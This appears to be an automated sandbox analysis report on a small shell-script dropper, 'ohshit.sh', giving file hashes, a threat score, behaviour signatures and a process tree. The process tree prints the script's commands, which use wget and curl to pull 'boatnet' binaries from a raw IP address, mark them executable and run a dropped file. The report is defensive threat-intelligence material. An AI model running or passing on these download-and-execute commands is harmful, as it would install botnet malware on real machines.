Analysis

  • max time kernel
    60s
  • max time network
    64s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:713
    • /usr/bin/wget
      wget http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:719
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat boatnet.x86
      2⤵
      PID:820
    • /bin/chmod
      chmod +x boatnet.x86 ohshit.sh WTF
      2⤵
      PID:821
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:822
    • /usr/bin/wget
      wget http://94.156.71.225/hiddenbin/boatnet.mips
      2⤵
      • Writes file to tmp directory
      PID:824
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.mips
      2⤵
      • Reads runtime system information
      PID:825

Network

MITRE ATT&CK Matrix

Downloads

  • /tmp/boatnet.x86

    Filesize

    36KB

    MD5

    ba2cb5b8715ba94c39e24e75a34d0ea0

    SHA1

    7182bf3b0e14e5224e741c15174c6e93f00df444

    SHA256

    01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

    SHA512

    0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d